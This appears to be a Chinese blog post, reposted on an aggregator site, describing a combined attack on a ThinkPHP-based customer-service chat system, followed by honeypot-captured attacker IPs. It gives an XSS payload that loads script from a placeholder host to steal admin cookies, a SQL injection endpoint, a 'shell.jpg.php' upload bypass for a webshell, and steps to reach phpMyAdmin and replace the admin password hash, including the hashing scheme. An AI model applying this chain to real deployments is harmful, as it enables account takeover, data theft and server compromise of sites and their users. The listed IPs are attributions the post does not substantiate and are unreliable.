針對某客服系統的組合攻擊-有解無憂

微信公眾號

文章更新于微信公眾號：蘇雅圖的雨

前言

本文從漏洞利用到對該客服系統進行滲透測驗中遇到的問題做詳細決議，并在文章結尾公布黑客針對該系統進行攻擊的樣本，

文章目錄

0x01 三重唱之漏洞利用

0x02 青出于藍而勝于藍

0x03 滲透測驗思路決議

0x04 公布黑客攻擊樣本

系統介紹

<< 點擊圖片查看下一張 >>

這套客服系統是基于ThinkPHP開發的，

并且經過了幾個版本的演變，

1.小馬PHP客服系統

這套系統應該是最早的，但是現在資產很少了，

2.迎客PHP客服系統

這個應該是某個小團隊改改著作權就用了的，

3.來客PHP客服系統

資產最多，成為主要攻擊目標，

4.好客PHP客服系統

......

其實這些客服系統都大同小異，

但是漏洞有一些區別，有的有，有的沒有，

原始碼獲取：關注公眾號發送“客服系統”，

三重唱之漏洞利用

XSS攻擊 (聯系客服頁)

漏洞位置：/admin/event/chat

漏洞危害：獲取在線客服權限

XSS_Payload：

<a href= https://www.cnblogs.com/arrdres/archive/2022/11/18/hidden>測驗<script src=//test.xss/xss1></script>

收到管理員Cookie

利用插件替換Cookie

訪問：/admin/index/chats.html

這個漏洞不是每套客服系統都有，有些會被過濾，有時候會過濾中文，可以經過編碼再發包，還有，有時候能打到管理系統的Cookie，可以直接獲得所有客服系統的管理權限，右上角位置回傳系統即可，

直接發送Payload是沒有效果的，需要改包發送，

注入漏洞（Dump）

漏洞位置：/admin/event/getwaitnum

漏洞危害：讀取資料庫內容

可以參考珂師傅的文章，這里不再細說，

傳送門：溫故而知新，老系統挖老漏洞

檔案上傳漏洞 (GetShell)

漏洞位置：/admin/event/uploadimg

校驗型別：黑名單驗證

繞過方法：shell.jpg.php

以下兩種情況說明不存在上傳漏洞，

還需要補充的是，當存在上傳漏洞時，

假如目標使用的是Apache服務，

那么訪問上傳后的WebShell是顯示403的，

青出于藍而勝于藍

事實上該客服系統在這幾年里逐漸成為了灰黑產重災區，主要是詐騙，而據我所知，領域可細分為貸款詐騙、殺豬盤詐騙、刷單詐騙、裝備刷取詐騙，用于灰產的則是一些網賭平臺、賬號出售、游戲道具出售等，詐騙實施者多為境外組織，坐標屬東南亞地區最多，

雖說“中國人不騙中國人”，但是都知道我們與東南亞國家的語言并不相通，因此……

筆者同時在長達三個月的時間里部署了多個蜜罐，

捕獲到了多位黑客長期對該客服系統廣撒網式的攻擊樣本，而這多位黑客的攻擊手法卻大同小異，大同小異的同時又有著天壤之別，于是筆者猜測其中不乏有幾位腳本小子，為什么這么說？

你們是否聽過名醫扁鵲的一個小故事？

扁鵲年輕時游歷于魏國，行醫于魏文王王庭，

一日，魏文王召見扁鵲，問道：“先生，寡人聽說你們家兄弟三人都精于醫術，誰醫術最好呢？”

扁鵲回答：“大哥飛氏最好，二哥中丘差些，我扁鵲是三人中最差的一個，”

魏文王不解地說：“都說扁鵲你是名滿天下的神醫，你的兩個兄弟并沒有神醫的名號，很多人都沒有聽說過他們，可你卻說他們的醫術在你之上，這是為什么呢？”

扁鵲解釋道：“陛下有所不知，我的大哥治病，往往都在病發之前，病人自己還不覺得有病，此時，大哥就開出藥方鏟除了病根，而且藥方很簡單，因此，他的醫術難以被人認可，沒有名氣，只是在我們家中被推崇備至，

我的二哥治病，是在病初起之時，病人已自覺有小病，因此，鄉里人都認為二哥只是治小病很靈，

我治病，都是在病情十分嚴重之時，病人痛苦萬分，病人家屬心急如焚，此時，他們看到我在經脈上穿刺，用針放血，或在患處敷以毒藥以毒攻毒，或動大手術直指病灶，使重病人病情得到緩解或治愈，因此，我名聞天下，”

SHORT STORY

這個故事說明了什么道理？不言而喻，

同樣的，對于這套系統進行攻擊的多位黑客其實是實力懸殊的，因為倘若有四位黑客，其中只有一位黑客能夠利用漏洞獲取整個網站的控制權限，而其他三位黑客只能夠獲取普通的管理權限，也就是常說的一個能夠Getshell，另外一個只能打XSS，

即便能獲取整個網站的控制權限，再讀取資料庫的組態檔，但依然不能改變腳本小子的命運，因為首先他會接連的面臨三大問題：

1.如何成功連接到資料庫，

一般情況下，資料庫是無法外連的，

2.如何進入客服管理后臺，

管理員的MD5值無法解密，

3.如何修改加密的MD5值，

非簡單的MD5加密，

這三大問題又再次重現了“扁鵲的故事”，因為即便能夠成功連接資料庫，獲得資料庫權限，但是估計腳本小子們也無法使用賬號密碼名正言順的登錄管理后臺，原因是后臺的賬號密碼并非簡單的MD5加密，

在這里我均給出解決思路和方法，

0x01 解決連接資料庫的問題

首先這套系統多用寶塔進行搭建，因此存在888埠和8888埠，前者為PhpMyAdmin服務，后者為寶塔登錄面板，

我猜測，這時候腳本小子假如想通過PhpMyAdmin獲得資料庫權限，他又會連續遇到三個小問題，

1.直接訪問888埠顯示403，

需要PhpMyAdmin的完整路徑，

2.無法讀取到PhpMyAdmin的路徑，

不會繞過Open_basedir，

3.無法訪問到PhpMyAdmin，

這是一個迷惑的問題，

以Linux系統為例，

網站的路徑為/www/wwwroot/

PhpMyAdmin的路徑為/www/server/phpmyadmin/

無法訪問到PhpMyAdmin的原因：

沒有使用真實IP+888埠去訪問，

因此完整的訪問方法應該是：

http://IP:888/phpmyadmin_3959eb4ebfa493a9/

比較簡單的思路則是上傳一個adminer.php檔案，

0x02 解決無法進入管理后臺的方法

按照上一步的思路登錄PhpMyAdmin后，存著管理員賬號和密碼的資料表是wolive_admin，而Password是無法解密的，這里給出第一個思路：本地搭建同樣的系統，替換Password值，

Username：admin

Password：c7122a1349c22cb3c009da3613d242ab

明文密碼：123456

注意，而這里給出替換Password的值僅適用于用戶名是admin的前提下，接下來我們還需要分析一下它是如何進行加密的，

0x03 分析加密的MD5值

代碼位置：/admin/controller/Login.php

框框位置簡單理解：用戶名+hjkj+密碼=MD5值

假設用戶名為admin，密碼為123456，

那MD5值應該是d8f7c2d2775869fb69b8757edcf6ae4f

經過測驗，實際上并非如此，

研究后得出加密方式：

$pass = md5(md5($adminPass) . $adminUser);

先將明文經過MD5第一遍加密，

再將第一次得到的MD5值加上用戶名做一次加密，

假設用戶名為test1，密碼為testpass，

1.加密明文：

2.第一次得到的MD5值為

179ad45c6ce2cb97cf1029e212046e81

再在MD5值的后面加上test1進行加密：

于是最終的Password值為

79c274670c1db637916f5f96b9be77e1

公布捕獲到的黑客樣本

黑客使用的XSS_Payload：

黑客使用的匿名IP：

45.76.188.135 新加坡

103.186.85.210 香港

27.0.232.185 香港

124.234.207.74 吉林長春

119.5.224.133 四川雅安

101.99.90.157 馬來西亞吉隆坡

18.139.84.50 新加坡亞馬遜云

38.45.125.42 香港 Cogent

202.182.104.253 日本東京

159.138.136.214 香港華為云

14.210.2.2 廣東湛江

123.253.26.170 香港

152.32.226.56 香港優刻云

152.32.240.127 香港優刻云

152.32.240.153 香港優刻云

152.32.189.234 香港優刻云

103.149.27.156 香港優刻云

8.210.52.141 香港阿里云

118.193.40.28 香港優刻云

118.193.34.44 香港優刻云

118.193.40.66 香港優刻云

118.193.35.125 香港優刻云

23.248.163.140 香港 Zenlayer

207.46.13.50 美國微軟云

91.245.253.48 羅馬尼亞

112.111.24.94 福建聯通

198.13.39.74 日本東京

123.253.26.170 香港

139.162.28.219 新加坡 Linode

129.150.52.158 美國芝加哥

152.32.239.146 香港優刻云

152.32.174.180 香港優刻云

152.32.226.200 香港優刻云

118.193.34.184 香港優刻云

51.195.216.255 英國倫敦

103.212.99.98 香港

103.14.33.97 香港 Zenlayer

128.199.20.138 美國加利福尼亞

黑客使用Resty對蜜罐中不同的獨立客服進行遍歷，并發送大量惡意的XSS_Payload：

黑客多次針對蜜罐進行目錄掃描：

疑似黑客忘記使用匿名IP：

112.111.24.94 福建聯通

多位黑客中有不少的來自Fofa搜索引擎的，這讓人值得深思，正如前文所說的，腳本小子有時候也很聰明，還知道有時候打XSS可能會遇到過濾中文的情況，于是都使用全英文去發送Payload，還能起到偽裝外國人的作用，不失為一個好辦法，

“出來混要有勢力，要有背景，你哪個道上的？”

完

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/536113.html

標籤：其他

上一篇：超精準！AI 結合郵件內容與附件的意圖理解與分類！?

下一篇：如何精簡 Prometheus 的指標和存盤占用